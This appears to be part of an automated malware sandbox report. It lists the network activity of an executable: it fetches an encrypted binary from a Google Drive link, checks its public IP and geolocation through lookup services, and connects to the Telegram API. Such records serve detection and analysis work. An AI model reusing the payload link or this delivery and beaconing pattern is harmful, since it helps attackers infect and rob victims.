Jan 11, 2025 00:04:28.155792952 CET	443	49784	149.154.167.220	192.168.2.5
Jan 11, 2025 00:04:28.155884027 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:04:28.156332016 CET	49784	443	192.168.2.5	149.154.167.220
Jan 11, 2025 00:05:32.127666950 CET	80	49738	193.122.130.0	192.168.2.5
Jan 11, 2025 00:05:32.127772093 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:06:07.110881090 CET	49738	80	192.168.2.5	193.122.130.0
Jan 11, 2025 00:06:07.115710974 CET	80	49738	193.122.130.0	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:04:14.528121948 CET	63917	53	192.168.2.5	1.1.1.1
Jan 11, 2025 00:04:14.535017014 CET	53	63917	1.1.1.1	192.168.2.5
Jan 11, 2025 00:04:15.709531069 CET	57316	53	192.168.2.5	1.1.1.1
Jan 11, 2025 00:04:15.716190100 CET	53	57316	1.1.1.1	192.168.2.5
Jan 11, 2025 00:04:19.583185911 CET	60957	53	192.168.2.5	1.1.1.1
Jan 11, 2025 00:04:19.589947939 CET	53	60957	1.1.1.1	192.168.2.5
Jan 11, 2025 00:04:20.982286930 CET	50641	53	192.168.2.5	1.1.1.1
Jan 11, 2025 00:04:20.989618063 CET	53	50641	1.1.1.1	192.168.2.5
Jan 11, 2025 00:04:27.129786015 CET	55960	53	192.168.2.5	1.1.1.1
Jan 11, 2025 00:04:27.136850119 CET	53	55960	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 00:04:14.528121948 CET	192.168.2.5	1.1.1.1	0xa421	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:15.709531069 CET	192.168.2.5	1.1.1.1	0x207	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:19.583185911 CET	192.168.2.5	1.1.1.1	0x3fc8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.982286930 CET	192.168.2.5	1.1.1.1	0xdd01	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:27.129786015 CET	192.168.2.5	1.1.1.1	0x95bb	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 00:04:14.535017014 CET	1.1.1.1	192.168.2.5	0xa421	No error (0)	drive.google.com		142.250.186.78	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:15.716190100 CET	1.1.1.1	192.168.2.5	0x207	No error (0)	drive.usercontent.google.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:19.589947939 CET	1.1.1.1	192.168.2.5	0x3fc8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:04:19.589947939 CET	1.1.1.1	192.168.2.5	0x3fc8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:19.589947939 CET	1.1.1.1	192.168.2.5	0x3fc8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:19.589947939 CET	1.1.1.1	192.168.2.5	0x3fc8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:19.589947939 CET	1.1.1.1	192.168.2.5	0x3fc8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:19.589947939 CET	1.1.1.1	192.168.2.5	0x3fc8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:20.989618063 CET	1.1.1.1	192.168.2.5	0xdd01	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:04:27.136850119 CET	1.1.1.1	192.168.2.5	0x95bb	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49738	193.122.130.0	80	1476	C:\Users\user\Desktop\WGi85dsMNp.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:04:19.600739002 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:04:20.343686104 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:04:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a0c0d588c43600522825fc54b80a4509 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 00:04:20.348366976 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:04:20.598328114 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:04:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3f85672b170252aa8f3518c72c74cd00 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 00:04:27.021626949 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:04:27.125792027 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:04:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c062dd2a464bc7e2ca2ffa142bf7e89 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	142.250.186.78	443	1476	C:\Users\user\Desktop\WGi85dsMNp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:04:15 UTC	216	OUT	GET /uc?export=download&id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2025-01-10 23:04:15 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 10 Jan 2025 23:04:15 GMT Location: https://drive.usercontent.google.com/download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-vNfauHT8aksO-_PE-v3HzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	172.217.16.193	443	1476	C:\Users\user\Desktop\WGi85dsMNp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:04:16 UTC	258	OUT	GET /download?id=1TlOsdPEqqbm9Tz6zptQP3sv7zEQ9o8Yz&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2025-01-10 23:04:18 UTC	4934	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFIdbgSHgMBTHz1GWBLF6RfIVlfYveNXPTRE2ZKpiT0ylF4qRWYSnt0F4XPBwxSV6F3gW8l1R8iEnZw Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="pzXrb66.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 94272 Last-Modified: Sun, 08 Dec 2024 21:18:24 GMT Date: Fri, 10 Jan 2025 23:04:18 GMT Expires: Fri, 10 Jan 2025 23:04:18 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=/SG2kQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-10 23:04:18 UTC	4934	IN	Data Raw: df 1f 5d 34 ad a1 cb 5f 5b 3e 43 89 48 32 3a de b7 09 81 dc 9e 82 27 7e e8 71 58 07 fb ce 54 c0 9a 15 92 d6 c5 a2 e8 5b 1f aa 6c 85 fa 97 2e de ff 65 4a 5e 60 e5 d5 3d 4f 41 fa 9f 62 f9 63 8f 06 fd 93 61 6a d9 90 55 2f bb 5f 52 80 e1 d2 ae 12 71 28 9f ad 30 0b ad 9f b1 1b 86 2e 23 38 db f0 e3 44 47 46 45 96 b1 13 08 6e 6c 33 d5 2d 63 63 44 96 71 5a c5 b3 49 e9 cd d9 31 01 fb a2 43 5c d6 1e bb 20 86 ae f8 ba ee 02 78 28 1a 7f fb 8d 0c 33 80 2b fc 14 e2 44 d9 2e 1b 4c 04 60 c2 fa 9c 5a a0 20 88 13 16 b9 a9 6f d2 90 50 1c 25 04 78 c3 61 e1 40 b3 5d 2e cb f0 07 33 51 f4 bf 46 8a 93 33 6f 1d 7f 23 b5 44 96 17 7c 4a bf bf d5 ba fa 5d 4f 83 2c 3a 5e 0e 4f bb 67 05 66 33 8d 61 18 ed 86 86 be 71 e2 5d 36 b3 a8 0b 2a ea 46 d8 14 ea c1 d3 76 82 f4 ce fc 88 90 60 19 Data Ascii: ]4_[>CH2:'~qXT[l.eJ^`=OAbcajU/_Rq(0.#8DGFEnl3-ccDqZI1C\ x(3+D.L`Z oP%xa@].3QF3o#D\|J]O,:^Ogf3aq]6*Fv`
2025-01-10 23:04:18 UTC	4828	IN	Data Raw: e7 1c eb 03 dc ea e9 87 36 92 27 e5 8d 7d 99 03 47 f1 c8 7f 57 ee 17 d8 3d 99 03 90 86 81 59 a7 03 65 41 52 90 55 21 bb 81 5e 7f 17 fe a9 a3 1e 29 9f ad 3a 0b 71 01 a2 3e ae 1d 23 38 d1 e3 e7 44 6f 14 45 96 bb ce 1f 6c 6c 33 d5 2d 63 1d 5c 96 71 5e b7 e5 42 e9 bd cf 19 00 fb a2 49 44 37 a5 a6 25 23 a2 0c 80 57 03 34 e5 48 a7 93 e4 75 00 f6 48 95 0d 8e 25 b4 0a 0b a0 6a 0e a7 e1 32 38 c5 0a fa 77 7e f6 4f 01 f2 de 61 6e 05 69 13 c8 94 cf 4d b4 57 1b cd d8 96 33 51 fe cd 66 c4 93 43 0b 2a 7c 23 04 11 de a6 7c 40 97 f8 d5 ba f0 32 3d 83 2e 31 55 1e 19 c9 63 64 67 43 f3 74 18 ed 82 f4 2c 7a 3c a8 1f f4 a8 2b 20 85 d5 78 15 e0 c1 ad 24 82 f4 ea 8f 1c 90 62 13 8e d4 75 e6 53 44 03 30 11 e5 ce 1d 85 d3 dd ac 34 00 b8 8d a7 43 94 5e 63 0e aa 3c 22 0f 66 1d 3d 09 Data Ascii: 6'}GW=YeARU!^):q>#8DoEll3-c\q^BID7%#W4HuH%j28w~OaniMW3QfC*\|#\|@2=.1UcdgCt,z<+ x$buSD04C^c<"f=
2025-01-10 23:04:18 UTC	1325	IN	Data Raw: e8 e5 ca 19 5a 79 b5 bc 26 3f 3f 67 3e 53 55 9c 77 dd e5 29 b9 33 ea 62 bc d6 64 67 11 e0 7a 88 d1 35 65 0c 9b a4 75 bc 73 ec 67 ef c3 1a f4 5e 69 72 af 70 86 96 c2 0a f7 c1 81 a7 5f 44 2b bc 68 9b 46 8e f5 f9 ff 8e ed 1c cf 04 b3 72 e9 85 47 d9 2e ed 9f 0b 44 6a 28 71 e0 2b 5d ee 14 bd 4d 8a 07 8b 82 d3 46 a5 78 27 69 d9 94 7d f8 bb 5f 58 7f 1e d2 ac d1 3b 28 9f a9 4e 58 ad df bb 33 d2 2e 23 32 d0 f7 f0 41 56 43 69 9b b3 68 42 6e 6c 37 fd fe 63 63 4e 96 71 5a c7 c8 01 e9 cd dd 4f d2 fb a2 49 7a 9d a4 b5 2a 3e af 26 9d 47 05 18 e8 39 50 db e4 7f 17 d8 8a 93 73 9a 25 b4 0e 7a 56 26 0e ad 8a c2 6b c5 00 f0 4e 2c 99 c0 0b ff dd 0c 48 14 6e 3b aa 06 b4 01 be 57 0e e3 23 07 33 5b f4 bf 16 e5 93 33 38 2c 76 23 28 7f e3 a6 59 4a bf ae d5 b8 84 60 af 83 2a 45 6b Data Ascii: Zy&??g>SUw)3bdgz5eusg^irp_D+hFrG.Dj(q+]MFx'i}_X;(NX3.#2AVCihBnl7ccNqZOIz>&G9Ps%zV&kN,Hn;W#3[38,v#(YJ`Ek
2025-01-10 23:04:18 UTC	1390	IN	Data Raw: 80 5d 6e bf 71 4d 7c d9 e0 f7 0e a2 56 3d bb 1e d2 a8 08 54 32 ed eb 25 0b dd 7d 94 00 8f 41 e5 38 db f6 41 61 5b 34 25 83 b1 63 aa 46 cc 33 d5 27 70 67 3a 99 71 5a c1 a2 4d c1 83 d9 31 8b 7b ad 43 52 cd a4 a7 22 1a 7a 35 9b 5c 10 31 f4 3e 06 02 3a 70 01 f2 a7 85 7f 90 25 af 61 79 2d 6a 04 ad 52 bc 13 c7 00 fa 4c 79 89 c0 01 f0 d4 02 4f 7f fe 17 a8 04 cf 4d be 4c 3a c1 f0 4d 30 51 f4 93 16 cf 82 33 50 c5 7c 23 08 75 f9 2b 43 4a bf be f0 ac 88 97 ba 83 5e 99 70 18 6d 5d 72 63 17 91 a8 71 6a ef 90 86 ce d3 19 c1 45 ad be 2b 5a 48 4a 6c 06 ee db 5e a7 82 f4 ef d9 9e ee bc 19 9d d9 16 da 2a d1 73 5f c4 f4 c9 78 b1 f6 ca d8 ea 7e 98 87 d5 aa f1 c9 13 61 7f 2f 2a 7b df 38 25 73 f6 69 9d e0 2d 1f 4c 5f 1a 3f 6d 2d 95 b4 ad cb 41 06 ef da e3 23 bd d0 c1 5e c3 3e Data Ascii: ]nqM\|V=T2%}A8Aa[4%cF3'pg:qZM1{CR"z5\1>:p%ay-jRLyOML:M0Q3P\|#u+CJ^pm]rcqjE+ZHJl^s_x~a/{8%si-L_?m-A#^>
2025-01-10 23:04:19 UTC	1390	IN	Data Raw: d5 6f 84 be 71 2d d4 26 be 32 38 24 fb 48 0b fb ea c1 d9 25 8d e5 e0 ed 86 e2 32 03 9d a3 0b 0b 3c d1 09 27 cd 9b 26 72 13 d9 ce b6 25 70 ea d9 bd 47 97 e1 2d 0e a0 25 39 60 6c 0c 24 7e d8 69 9d e0 4c e9 4a 4d 05 a1 b2 2d 9f 09 1c fd 49 6b 26 00 f4 ff 42 1e d9 5e b2 42 90 8f 1f 6f 92 b3 b8 80 6a 8e be 59 77 96 e9 2e fc 45 b1 bc 20 64 fd 58 ad c2 83 66 6e 83 5b 76 34 32 d7 9c 83 7e ea 64 37 9e 61 8b 07 de 7a ad 4f 9a 32 bb 0b 17 56 d8 b6 2d 14 a1 ef ab 57 9e 5e 69 d6 dc d3 51 57 23 a7 22 16 d8 18 9b f2 77 0d d6 d9 02 e5 fd a6 8e 80 51 5a 40 ec 38 4b 8d 55 ac b4 8a 71 b6 5c b2 ad 6b 6f 72 8c 4b 0f f0 70 b1 4b dd a3 b9 05 98 33 d5 41 88 95 33 ff 43 9b 88 f8 11 4b 40 fb 04 5a 54 16 12 b9 bc 26 ab 32 73 d5 ef 3a de 1c c9 48 7e 14 41 4f 14 29 5b a1 27 0f 63 0a Data Ascii: oq-&28$H%2<'&r%pG-%9`l$~iLJM-Ik&B^BojYw.E dXfn[v42~d7azO2V-W^iQW#"wQZ@8KUq\korKpK3A3CK@ZT&2s:H~AO)['c
2025-01-10 23:04:19 UTC	1390	IN	Data Raw: c7 2e a0 ce 66 1f ed c2 93 e1 b2 8f 80 83 44 4b 5b 4c 27 76 62 54 b8 38 43 41 b7 3a 89 ff 7a 73 6b 9a 4c 9f 90 89 b0 4a d1 b5 87 ee 86 22 cb 46 6d 05 16 32 50 9e 93 ee 22 53 4a fa 1f 72 a9 cb 12 b3 94 68 d9 d0 62 c6 89 56 4f e0 c9 38 67 33 78 a3 66 ab 4b 89 ac 60 90 00 ba cf 44 cf 0e 90 20 03 b0 f0 0b 48 e6 37 37 3e 81 96 91 87 22 bd c7 ac 20 ac da d4 78 16 28 89 0c ba 75 81 56 2e 08 55 c9 bc c1 3e 7a 8b 84 5d a4 12 f8 8f 09 dd e8 b8 96 11 c5 c2 96 bc 23 0e 49 69 fe 39 22 8f 26 65 38 e4 1a dd f6 6b 61 77 fc 96 2a 7d e1 58 fa 97 a9 27 2a 96 1a 58 9a 52 15 62 68 a8 1f 5a 7e 39 61 88 15 fa 70 3a 76 6e f1 9e be ca 22 9e 27 af 09 b8 41 20 a8 f3 01 5c af 42 d8 16 f9 f2 59 b1 a0 ea 0f 63 a4 39 40 fc cb 4f d2 e3 c2 d0 d0 fc 3e 1a 80 10 0a 07 23 84 b1 73 2a 4b e7 Data Ascii: .fDK[L'vbT8CA:zskLJ"Fm2P"SJrhbVO8g3xfK`D H77>" x(uV.U>z]#Ii9"&e8kaw}X'XRbhZ~9ap:vn"'A \BYc9@O>#s*K
2025-01-10 23:04:19 UTC	1390	IN	Data Raw: e7 fe 6b 1d 76 ed 9e 76 fd e1 49 f0 9b b8 1e ff bb aa 8c ff 63 00 17 09 80 51 5b 52 3e 7a 80 66 c3 88 3a 77 0b fb 99 87 86 23 42 2f 27 13 74 9b 37 74 e8 df a3 ac 5e d8 67 85 27 51 aa b7 cb 11 04 f9 50 5b 20 f4 f3 c1 e5 de c3 d7 d5 2e 0f 96 38 e5 16 24 fc ca 6b f4 1b ad 5c cc 88 22 eb ea 08 c0 5c e9 a9 67 40 9a ba 9a 70 ab 8d 35 c2 90 25 f1 fa 73 c2 d7 2a b0 ef c5 ce 26 02 d5 ee a8 bd 70 01 bc 8d 1a 8a 8a bd 8b 3d a5 41 aa 26 3a c0 a6 3b 7c 89 7c 9b d5 45 c9 79 d6 ea f8 ef e7 68 1c e1 7f 1b 4c cf 8e 81 e1 be dd 57 02 c9 3d d9 1f 17 81 eb ee 61 98 a2 58 0c ea fd fe 5d fe d8 d7 be c7 02 4c bb 71 a1 29 69 89 49 bd da d1 a2 93 0f d6 7e f8 db 0c 36 4c 90 3e e3 0b bf e6 26 c5 9f 1d 16 b0 fc a9 cc 8a 35 76 ec 13 13 68 3e b1 e3 21 05 93 6e 66 8f 23 a6 37 9e cd 44 Data Ascii: kvvIcQ[R>zf:w#B/'t7t^g'QP[ .8$k\"\g@p5%s*&p=A&:;\|\|EyhLW=aX]Lq)iI~6L>&5vh>!nf#7D
2025-01-10 23:04:19 UTC	1390	IN	Data Raw: 4d da 97 98 fa a0 0f 15 17 ea 2f d3 33 0b c6 45 ef 61 98 dc 58 62 b5 f7 d6 c3 ef d1 f9 38 ce 13 43 bc 8a a0 3a 63 b3 63 ab 0c 7a b1 98 14 d5 43 e9 81 3a 2a 4c ea 40 33 64 e0 e0 49 90 8e 14 34 0d 40 a9 ca 9f 23 73 ec 02 3c 3a dc 9c 49 51 13 b1 e7 77 88 5b 2c d5 9d ac 2e 1a 22 20 d8 15 b5 2c d7 27 0b 84 1f 8b 95 1d 33 85 f8 b9 be 69 d5 9c 83 02 22 89 c7 71 38 87 ea 28 1a e9 2b 41 71 6c 0d 2c 78 fe 12 af 2b 2a f1 dd ea 57 5f 36 e1 08 d5 81 c5 aa ef 79 64 0d 58 f0 ef 46 52 2f ba 14 b6 40 57 0a c9 c9 2c 0f 80 de e5 22 2b 53 a6 db ef e6 d2 f5 d3 82 da fe 68 51 83 85 77 36 2c 90 c4 d6 0a 26 02 d3 6f fe e8 90 c4 2b 94 e6 52 17 d8 7f 05 2b b1 74 14 3c 8f 54 d2 f7 66 24 f7 58 e3 ec 07 3b e4 5d 25 0c 28 74 b1 a0 1e 3d 49 7a 02 38 10 f8 5b 96 14 57 ef ae 00 c7 09 7f Data Ascii: M/3EaXb8C:cczC:L@3dI4@#s<:IQw[,." ,'3i"q8(+Aql,x+W_6ydXFR/@W,"+ShQw6,&o+R+t<Tf$X;]%(t=Iz8[W
2025-01-10 23:04:19 UTC	1390	IN	Data Raw: 33 be 00 6a 96 86 c6 07 32 48 b4 87 c9 a3 b3 bf d7 8e 86 11 50 c7 ad 80 d5 12 15 f4 98 10 1e 56 d0 59 ea e9 e1 38 f2 3e 98 c5 47 17 ac cc 2d 1a ee 70 b6 13 15 29 94 e2 62 54 55 6c ff ea d4 8a c6 50 50 d6 0c 4a 21 fc c9 62 49 7a d6 3b 38 ae 67 96 14 59 ed ad 28 a1 5b 7f a3 33 d1 10 db 7c 55 f6 4b 8c 48 db 27 43 7a 3b 8e 6b 2f c9 d5 08 83 7a d8 eb f7 07 a4 18 c3 6f 07 02 0b a4 4f 0b aa ae b8 c7 0f 93 73 73 73 e8 d1 4a f0 c3 e2 61 1a 90 d9 1b 44 6d e2 45 7b a9 c8 6a 1f e3 88 cd 1d e7 8b 6d 17 83 f1 58 34 2c 3d 85 10 7b 18 75 23 53 52 41 4c 9b d2 2f 80 a2 41 d2 d2 2a 35 f4 e3 e1 4b 11 01 db c4 60 60 a8 fa e9 67 10 6d 4a 04 73 cd 6f 69 f6 37 84 63 31 7c 38 4c 65 4f ae 54 5a 0a 91 69 0f 64 9c b1 55 5c 33 97 01 57 42 ee a8 61 dc 80 eb 99 b3 1c f3 56 38 c5 81 d1 Data Ascii: 3j2HPVY8>G-p)bTUlPPJ!bIz;8gY([3\|UKH'Cz;k/zoOsssJaDmE{jmX4,={u#SRAL/A*5K``gmJsoi7c1\|8LeOTZidU\3WBaV8
2025-01-10 23:04:19 UTC	1390	IN	Data Raw: 8d 2f 24 35 06 7c aa 10 7b 09 75 3c 4f 69 99 4c 9b 8f 5c b3 81 2b a3 fa 64 25 f4 e9 eb 0f 17 29 22 df 50 6e a3 81 d1 21 11 5e 4a 02 11 1a 70 75 d8 e3 8c 11 61 12 a1 19 0a ed 86 1a 5c 2c 93 0c dc 62 b4 4f 42 86 2a 9a 10 7d 03 d7 bf 60 da f3 34 88 b4 68 97 42 4a ef f2 04 80 84 a8 69 fb 9d 61 57 d7 78 bc 64 e8 31 82 6e 07 48 a2 58 1d f4 6b 1b 85 2c 31 2f 02 61 35 00 9e d1 63 47 52 b7 4b bf 89 c6 2d 28 2c a3 95 a5 c8 72 a8 b3 af 28 4a 64 60 4c cb 4c 8a 05 c9 7a 29 b9 31 fb 1c e6 d3 4c f0 39 32 7c 9b d3 24 6f 25 56 cb 20 f2 72 ec 69 82 c5 60 b9 54 06 73 86 a1 8c be 5c 77 bb c7 92 aa 4e 4d 15 42 69 88 5f af fd ef 9b 8f fe 17 fa 0f 9f 75 c1 2d 3c 9f 24 fc 9e 1a 48 6a 28 71 d9 76 75 7b 1e b7 4d 8a 06 9a 86 ff 60 87 03 49 c3 d9 90 5f 23 aa 58 20 e3 02 d2 de c5 a4 Data Ascii: /$5\|{u<OiL\+d%)"Pn!^Jpua\,bOB*}`4hBJiaWxd1nHXk,1/a5cGRK-(,r(Jd`LLz)1L92\|$o%V ri`Ts\wNMBi_u-<$Hj(qvu{M`I_#X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49749	104.21.16.1	443	1476	C:\Users\user\Desktop\WGi85dsMNp.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 23:04:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
